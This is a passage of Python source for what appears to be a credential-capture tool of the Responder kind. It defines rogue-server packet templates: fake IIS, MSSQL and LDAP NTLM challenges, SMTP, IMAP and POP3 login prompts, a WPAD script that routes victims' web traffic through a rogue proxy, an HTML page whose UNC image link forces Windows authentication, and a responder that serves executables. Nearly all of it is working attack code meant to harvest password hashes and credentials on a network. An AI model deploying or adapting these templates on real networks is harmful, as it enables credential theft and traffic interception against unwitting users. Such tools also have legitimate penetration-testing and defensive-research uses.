self.fields["Av5Len"] = struct.pack("<i", len(str(self.fields["Av5Str"])))[:2]
class IIS_Auth_401_Ans(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
("ServerType", "Server: Microsoft-IIS/6.0\r\n"),
("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("Len", "Content-Length: 0\r\n"),
("CRLF", "\r\n"),
])
class IIS_Auth_Granted(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("ServerType", "Server: Microsoft-IIS/6.0\r\n"),
("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("CRLF", "\r\n\r\n"),
("Payload", "<html>\n<head>\n</head>\n<body>\n<img src='file:\\\\\\\\\\\\shar\\smileyd.ico' alt='Loading' height='1' width='2'>\n</body>\n</html>\n"),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
class IIS_NTLM_Challenge_Ans(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
("ServerType", "Server: Microsoft-IIS/6.0\r\n"),
("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWWAuth", "WWW-Authenticate: NTLM "),
("Payload", ""),
("Payload-CRLF", "\r\n"),
("PoweredBy", "X-Powered-By: ASP.NC0CD7B7802C76736E9B26FB19BEB2D36290B9FF9A46EDDA5ET\r\n"),
("Len", "Content-Length: 0\r\n"),
("CRLF", "\r\n"),
])
def calculate(self,payload):
self.fields["Payload"] = b64encode(payload)
class IIS_Basic_401_Ans(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
("ServerType", "Server: Microsoft-IIS/6.0\r\n"),
("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWW-Auth", "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("AllowOrigin", "Access-Control-Allow-Origin: *\r\n"),
("AllowCreds", "Access-Control-Allow-Credentials: true\r\n"),
("Len", "Content-Length: 0\r\n"),
("CRLF", "\r\n"),
])
##### Proxy mode Packets #####
class WPADScript(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("ServerTlype", "Server: Microsoft-IIS/6.0\r\n"),
("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
("Type", "Content-Type: application/x-ns-proxy-autoconfig\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("CRLF", "\r\n\r\n"),
("Payload", "function FindProxyForURL(url, host){return 'PROXY wpadwpadwpad:3141; DIRECT';}"),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
class ServeExeFile(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("ContentType", "Content-Type: application/octet-stream\r\n"),
("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
("Server", "Server: Microsoft-IIS/7.5\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("ContentDisp", "Content-Disposition: attachment; filename="),
("ContentDiFile", ""),
("FileCRLF", ";\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
("Connection", "Connection: keep-alive\r\n"),
("X-CCC", "US\r\n"),
("X-CID", "2\r\n"),
("CRLF", "\r\n"),
("Payload", "jj"),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
class ServeHtmlFile(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("ContentType", "Content-Type: text/html\r\n"),
("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
("Server", "Server: Microsoft-IIS/7.5\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
("Connection", "Connection: keep-alive\r\n"),
("CRLF", "\r\n"),
("Payload", "jj"),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
##### FTP Packets #####
class FTPPacket(Packet):
fields = OrderedDict([
("Code", "220"),
("Separator", "\x20"),
("Message", "Welcome"),
("Terminator", "\x0d\x0a"),
])
##### SQL Packets #####
class MSSQLPreLoginAnswer(Packet):
fields = OrderedDict([
("PacketType", "\x04"),
("Status", "\x01"),
("Len", "\x00\x25"),
("SPID", "\x00\x00"),
("PacketID", "\x01"),
("Window", "\x00"),
("TokenType", "\x00"),
("VersionOffset", "\x00\x15"),
("VersionLen", "\x00\x06"),
("TokenType1", "\x01"),
("EncryptionOffset", "\x00\x1b"),
("EncryptionLen", "\x00\x01"),
("TokenType2", "\x02"),
("InstOptOffset", "\x00\x1c"),
("InstOptLen", "\x00\x01"),
("TokenTypeThrdID", "\x03"),
("ThrdIDOffset", "\x00\x1d"),
("ThrdIDLen", "\x00\x00"),
("ThrdIDTerminator", "\xff"),
("VersionStr", "\x09\x00\x0f\xc3"),
("SubBuild", "\x00\x00"),
("EncryptionStr", "\x02"),
("InstOptStr", "\x00"),
])
def calculate(self):
CalculateCompletePacket = str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["VersionOffset"])+str(self.fields["VersionLen"])+str(self.fields["TokenType1"])+str(self.fields["EncryptionOffset"])+str(self.fields["EncryptionLen"])+str(self.fields["TokenType2"])+str(self.fields["InstOptOffset"])+str(self.fields["InstOptLen"])+str(self.fields["TokenTypeThrdID"])+str(self.fields["ThrdIDOffset"])+str(self.fields["ThrdIDLen"])+str(self.fields["ThrdIDTerminator"])+str(self.fields["VersionStr"])+str(self.fields["SubBuild"])+str(self.fields["EncryptionStr"])+str(self.fields["InstOptStr"])
VersionOffset = str(self.fields["TokenType"])+str(self.fields["VersionOffset"])+str(self.fields["VersionLen"])+str(self.fields["TokenType1"])+str(self.fields["EncryptionOffset"])+str(self.fields["EncryptionLen"])+str(self.fields["TokenType2"])+str(self.fields["InstOptOffset"])+str(self.fields["InstOptLen"])+str(self.fields["TokenTypeThrdID"])+str(self.fields["ThrdIDOffset"])+str(self.fields["ThrdIDLen"])+str(self.fields["ThrdIDTerminator"])
EncryptionOffset = VersionOffset+str(self.fields["VersionStr"])+str(self.fields["SubBuild"])
InstOpOffset = EncryptionOffset+str(self.fields["EncryptionStr"])
ThrdIDOffset = InstOpOffset+str(self.fields["InstOptStr"])
self.fields["Len"] = struct.pack(">h",len(CalculateCompletePacket))
#Version
self.fields["VersionLen"] = struct.pack(">h",len(self.fields["VersionStr"]+self.fields["SubBuild"]))
self.fields["VersionOffset"] = struct.pack(">h",len(VersionOffset))
#Encryption
self.fields["EncryptionLen"] = struct.pack(">h",len(self.fields["EncryptionStr"]))
self.fields["EncryptionOffset"] = struct.pack(">h",len(EncryptionOffset))
#InstOpt
self.fields["InstOptLen"] = struct.pack(">h",len(self.fields["InstOptStr"]))
self.fields["EncryptionOffset"] = struct.pack(">h",len(InstOpOffset))
#ThrdIDOffset
self.fields["ThrdIDOffset"] = struct.pack(">h",len(ThrdIDOffset))
class MSSQLNTLMChallengeAnswer(Packet):
fields = OrderedDict([
("PacketType", "\x04"),
("Status", "\x01"),
("Len", "\x00\xc7"),
("SPID", "\x00\x00"),
("PacketID", "\x01"),
("Window", "\x00"),
("TokenType", "\xed"),
("SSPIBuffLen", "\xbc\x00"),
("Signature", "NTLMSSP"),
("SignatureNull", "\x00"),
("MessageType", "\x02\x00\x00\x00"),
("TargetNameLen", "\x06\x00"),
("TargetNameMaxLen", "\x06\x00"),
("TargetNameOffset", "\x38\x00\x00\x00"),
("NegoFlags", "\x05\x02\x89\xa2"),
("ServerChallenge", ""),
("Reserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("TargetInfoLen", "\x7e\x00"),
("TargetInfoMaxLen", "\x7e\x00"),
("TargetInfoOffset", "\x3e\x00\x00\x00"),
("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
("TargetNameStr", "SMB"),
("Av1", "\x02\x00"),#nbt name
("Av1Len", "\x06\x00"),
("Av1Str", "SMB"),
("Av2", "\x01\x00"),#Server name
("Av2Len", "\x14\x00"),
("Av2Str", "SMB-TOOLKIT"),
("Av3", "\x04\x00"),#Full Domain name
("Av3Len", "\x12\x00"),
("Av3Str", "smb.local"),
("Av4", "\x03\x00"),#Full machine domain name
("Av4Len", "\x28\x00"),
("Av4Str", "server2003.smb.local"),
("Av5", "\x05\x00"),#Domain Forest Name
("Av5Len", "\x12\x00"),
("Av5Str", "smb.local"),
("Av6", "\x00\x00"),#AvPairs Terminator
("Av6Len", "\x00\x00"),
])
def calculate(self):
# First convert to unicode
self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le')
self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le')
self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le')
self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le')
self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le')
self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le')
# Then calculate
CalculateCompletePacket = str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["SSPIBuffLen"])+str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
CalculateSSPI = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])
CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"])
CalculateAvPairsLen = str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
self.fields["Len"] = struct.pack(">h",len(CalculateCompletePacket))
self.fields["SSPIBuffLen"] = struct.pack("<i",len(CalculateSSPI))[:2]
# Target Name Offsets
self.fields["TargetNameOffset"] = struct.pack("<i", len(CalculateNameOffset))
self.fields["TargetNameLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
self.fields["TargetNameMaxLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
# AvPairs Offsets
self.fields["TargetInfoOffset"] = struct.pack("<i", len(CalculateAvPairsOffset))
self.fields["TargetInfoLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
self.fields["TargetInfoMaxLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
# AvPairs StrLen
self.fields["Av1Len"] = struct.pack("<i", len(str(self.fields["Av1Str"])))[:2]
self.fields["Av2Len"] = struct.pack("<i", len(str(self.fields["Av2Str"])))[:2]
self.fields["Av3Len"] = struct.pack("<i", len(str(self.fields["Av3Str"])))[:2]
self.fields["Av4Len"] = struct.pack("<i", len(str(self.fields["Av4Str"])))[:2]
self.fields["Av5Len"] = struct.pack("<i", len(str(self.fields["Av5Str"])))[:2]
##### SMTP Packets #####
class SMTPGreeting(Packet):
fields = OrderedDict([
("Code", "220"),
("Separator", "\x20"),
("Message", "smtp01.local ESMTP"),
("CRLF", "\x0d\x0a"),
])
class SMTPAUTH(Packet):
fields = OrderedDict([
("Code0", "250"),
("Separator0", "\x2d"),
("Message0", "smtp01.local"),
("CRLF0", "\x0d\x0a"),
("Code", "250"),
("Separator", "\x20"),
("Message", "AUTH LOGIN PLAIN XYMCOOKIE"),
("CRLF", "\x0d\x0a"),
])
class SMTPAUTH1(Packet):
fields = OrderedDict([
("Code", "334"),
("Separator", "\x20"),
("Message", "VXNlcm5hbWU6"),#Username
("CRLF", "\x0d\x0a"),
])
class SMTPAUTH2(Packet):
fields = OrderedDict([
("Code", "334"),
("Separator", "\x20"),
("Message", "UGFzc3dvcmQ6"),#Password
("CRLF", "\x0d\x0a"),
])
##### IMAP Packets #####
class IMAPGreeting(Packet):
fields = OrderedDict([
("Code", "* OK IMAP4 service is ready."),
("CRLF", "\r\n"),
])
class IMAPCapability(Packet):
fields = OrderedDict([
("Code", "* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN"),
("CRLF", "\r\n"),
])
class IMAPCapabilityEnd(Packet):
fields = OrderedDict([
("Tag", ""),
("Message", " OK CAPABILITY completed."),
("CRLF", "\r\n"),
])
##### POP3 Packets #####
class POPOKPacket(Packet):
fields = OrderedDict([
("Code", "+OK"),
("CRLF", "\r\n"),
])
##### LDAP Packets #####
class LDAPSearchDefaultPacket(Packet):
fields = OrderedDict([
("ParserHeadASNID", "\x30"),
("ParserHeadASNLen", "\x0c"),
("MessageIDASNID", "\x02"),
("MessageIDASNLen", "\x01"),
("MessageIDASNStr", "\x0f"),
("OpHeadASNID", "\x65"),
("OpHeadASNIDLen", "\x07"),
("SearchDoneSuccess", "\x0A\x01\x00\x04\x00\x04\x00"),#No Results.
])
class LDAPSearchSupportedCapabilitiesPacket(Packet):
fields = OrderedDict([
("ParserHeadASNID", "\x30"),
("ParserHeadASNLenOfLen", "\x84"),
("ParserHeadASNLen", "\x00\x00\x00\x7e"),#126
("MessageIDASNID", "\x02"),
("MessageIDASNLen", "\x01"),
("MessageIDASNStr", "\x02"),
("OpHeadASNID", "\x64"),
("OpHeadASNIDLenOfLen", "\x84"),
("OpHeadASNIDLen", "\x00\x00\x00\x75"),#117
("ObjectName", "\x04\x00"),
("SearchAttribASNID", "\x30"),
("SearchAttribASNLenOfLen", "\x84"),
("SearchAttribASNLen", "\x00\x00\x00\x6d"),#109
("SearchAttribASNID1", "\x30"),
("SearchAttribASN1LenOfLen", "\x84"),
("SearchAttribASN1Len", "\x00\x00\x00\x67"),#103
("SearchAttribASN2ID", "\x04"),
("SearchAttribASN2Len", "\x15"),#21
("SearchAttribASN2Str", "supportedCapabilities"),
("SearchAttribASN3ID", "\x31"),
("SearchAttribASN3LenOfLen", "\x84"),
("SearchAttribASN3Len", "\x00\x00\x00\x4a"),
("SearchAttrib1ASNID", "\x04"),
("SearchAttrib1ASNLen", "\x16"),#22
("SearchAttrib1ASNStr", "1.2.840.113556.1.4.800"),
("SearchAttrib2ASNID", "\x04"),
("SearchAttrib2ASNLen", "\x17"),#23
("SearchAttrib2ASNStr", "1.2.840.113556.1.4.1670"),
("SearchAttrib3ASNID", "\x04"),
("SearchAttrib3ASNLen", "\x17"),#23
("SearchAttrib3ASNStr", "1.2.840.113556.1.4.1791"),
("SearchDoneASNID", "\x30"),
("SearchDoneASNLenOfLen", "\x84"),
("SearchDoneASNLen", "\x00\x00\x00\x10"),#16
("MessageIDASN2ID", "\x02"),
("MessageIDASN2Len", "\x01"),
("MessageIDASN2Str", "\x02"),
("SearchDoneStr", "\x65\x84\x00\x00\x00\x07\x0a\x01\x00\x04\x00\x04\x00"),
## No need to calculate anything this time, this packet is generic.
])
class LDAPSearchSupportedMechanismsPacket(Packet):
fields = OrderedDict([
("ParserHeadASNID", "\x30"),
("ParserHeadASNLenOfLen", "\x84"),
("ParserHeadASNLen", "\x00\x00\x00\x60"),#96
("MessageIDASNID", "\x02"),
("MessageIDASNLen", "\x01"),
("MessageIDASNStr", "\x02"),
("OpHeadASNID", "\x64"),
("OpHeadASNIDLenOfLen", "\x84"),
("OpHeadASNIDLen", "\x00\x00\x00\x57"),#87
("ObjectName", "\x04\x00"),
("SearchAttribASNID", "\x30"),
("SearchAttribASNLenOfLen", "\x84"),
("SearchAttribASNLen", "\x00\x00\x00\x4f"),#79
("SearchAttribASNID1", "\x30"),
("SearchAttribASN1LenOfLen", "\x84"),
("SearchAttribASN1Len", "\x00\x00\x00\x49"),#73
("SearchAttribASN2ID", "\x04"),
("SearchAttribASN2Len", "\x17"),#23
("SearchAttribASN2Str", "supportedSASLMechanisms"),
("SearchAttribASN3ID", "\x31"),
("SearchAttribASN3LenOfLen", "\x84"),
("SearchAttribASN3Len", "\x00\x00\x00\x2a"),#42
("SearchAttrib1ASNID", "\x04"),
("SearchAttrib1ASNLen", "\x06"),#6
("SearchAttrib1ASNStr", "GSSAPI"),
("SearchAttrib2ASNID", "\x04"),
("SearchAttrib2ASNLen", "\x0a"),#10
("SearchAttrib2ASNStr", "GSS-SPNEGO"),
("SearchAttrib3ASNID", "\x04"),
("SearchAttrib3ASNLen", "\x08"),#8
("SearchAttrib3ASNStr", "EXTERNAL"),
("SearchAttrib4ASNID", "\x04"),
("SearchAttrib4ASNLen", "\x0a"),#10
("SearchAttrib4ASNStr", "DIGEST-MD5"),
("SearchDoneASNID", "\x30"),
("SearchDoneASNLenOfLen", "\x84"),
("SearchDoneASNLen", "\x00\x00\x00\x10"),#16
("MessageIDASN2ID", "\x02"),
("MessageIDASN2Len", "\x01"),
("MessageIDASN2Str", "\x02"),
("SearchDoneStr", "\x65\x84\x00\x00\x00\x07\x0a\x01\x00\x04\x00\x04\x00"),
## No need to calculate anything this time, this packet is generic.
])
class LDAPNTLMChallenge(Packet):
fields = OrderedDict([
("ParserHeadASNID", "\x30"),
("ParserHeadASNLenOfLen", "\x84"),
("ParserHeadASNLen", "\x00\x00\x00\xD0"),#208
("MessageIDASNID", "\x02"),
("MessageIDASNLen", "\x01"),
("MessageIDASNStr", "\x02"),
("OpHeadASNID", "\x61"),
("OpHeadASNIDLenOfLen", "\x84"),
("OpHeadASNIDLen", "\x00\x00\x00\xc7"),#199
("Status", "\x0A"),
("StatusASNLen", "\x01"),
("StatusASNStr", "\x0e"), #In Progress.
("MatchedDN", "\x04\x00"), #Null
("ErrorMessage", "\x04\x00"), #Null
("SequenceHeader", "\x87"),
("SequenceHeaderLenOfLen", "\x81"),
("SequenceHeaderLen", "\x82"), #188
("NTLMSSPSignature", "NTLMSSP"),
("NTLMSSPSignatureNull", "\x00"),
("NTLMSSPMessageType", "\x02\x00\x00\x00"),
("NTLMSSPNtWorkstationLen", "\x1e\x00"),
("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"),
("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"),
("NTLMSSPNtNegotiateFlags", "\x15\x82\x89\xe2"),
("NTLMSSPNtServerChallenge", "\x81\x22\x33\x34\x55\x46\xe7\x88"),
("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("NTLMSSPNtTargetInfoLen", "\x94\x00"),
("NTLMSSPNtTargetInfoMaxLen", "\x94\x00"),
("NTLMSSPNtTargetInfoBuffOffset", "\x56\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionHigh", "\x05"),
("NegTokenInitSeqMechMessageVersionLow", "\x02"),
("NegTokenInitSeqMechMessageVersionBuilt", "\xce\x0e"),
("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"),
("NTLMSSPNtWorkstationName", "SMB12"),
("NTLMSSPNTLMChallengeAVPairsId", "\x02\x00"),
("NTLMSSPNTLMChallengeAVPairsLen", "\x0a\x00"),
("NTLMSSPNTLMChallengeAVPairsUnicodeStr", "smb12"),
("NTLMSSPNTLMChallengeAVPairs1Id", "\x01\x00"),
("NTLMSSPNTLMChallengeAVPairs1Len", "\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs1UnicodeStr", "SERVER2008"),
("NTLMSSPNTLMChallengeAVPairs2Id", "\x04\x00"),
("NTLMSSPNTLMChallengeAVPairs2Len", "\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs2UnicodeStr", "smb12.local"),
("NTLMSSPNTLMChallengeAVPairs3Id", "\x03\x00"),
("NTLMSSPNTLMChallengeAVPairs3Len", "\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs3UnicodeStr", "SERVER2008.smb12.local"),
("NTLMSSPNTLMChallengeAVPairs5Id", "\x05\x00"),
("NTLMSSPNTLMChallengeAVPairs5Len", "\x04\x00"),
("NTLMSSPNTLMChallengeAVPairs5UnicodeStr", "smb12.local"),
("NTLMSSPNTLMChallengeAVPairs6Id", "\x00\x00"),
("NTLMSSPNTLMChallengeAVPairs6Len", "\x00\x00"),
])
def calculate(self):
###### Convert strings to Unicode first
self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
###### Workstation Offset
CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
###### AvPairs Offset
CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
###### LDAP Packet Len
CalculatePacketLen = str(self.fields["MessageIDASNID"])+str(self.fields["MessageIDASNLen"])+str(self.fields["MessageIDASNStr"])+str(self.fields["OpHeadASNID"])+str(self.fields["OpHeadASNIDLenOfLen"])+str(self.fields["OpHeadASNIDLen"])+str(self.fields["Status"])+str(self.fields["StatusASNLen"])+str(self.fields["StatusASNStr"])+str(self.fields["MatchedDN"])+str(self.fields["ErrorMessage"])+str(self.fields["SequenceHeader"])+str(self.fields["SequenceHeaderLen"])+str(self.fields["SequenceHeaderLenOfLen"])+CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
OperationPacketLen = str(self.fields["Status"])+str(self.fields["StatusASNLen"])+str(self.fields["StatusASNStr"])+str(self.fields["MatchedDN"])+str(self.fields["ErrorMessage"])+str(self.fields["SequenceHeader"])+str(self.fields["SequenceHeaderLen"])+str(self.fields["SequenceHeaderLenOfLen"])+CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
NTLMMessageLen = CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
##### LDAP Len Calculation:
self.fields["ParserHeadASNLen"] = struct.pack(">i", len(CalculatePacketLen))
self.fields["OpHeadASNIDLen"] = struct.pack(">i", len(OperationPacketLen))
self.fields["SequenceHeaderLen"] = struct.pack(">B", len(NTLMMessageLen))
##### Workstation Offset Calculation:
self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation))
self.fields["NTLMSSPNtWorkstationLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
##### IvPairs Offset Calculation:
self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack("<h", len(CalculateLenAvpairs))
self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack("<h", len(CalculateLenAvpairs))
##### IvPair Calculation:
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
##### SMB Packets #####
class SMBHeader(Packet):
fields = OrderedDict([
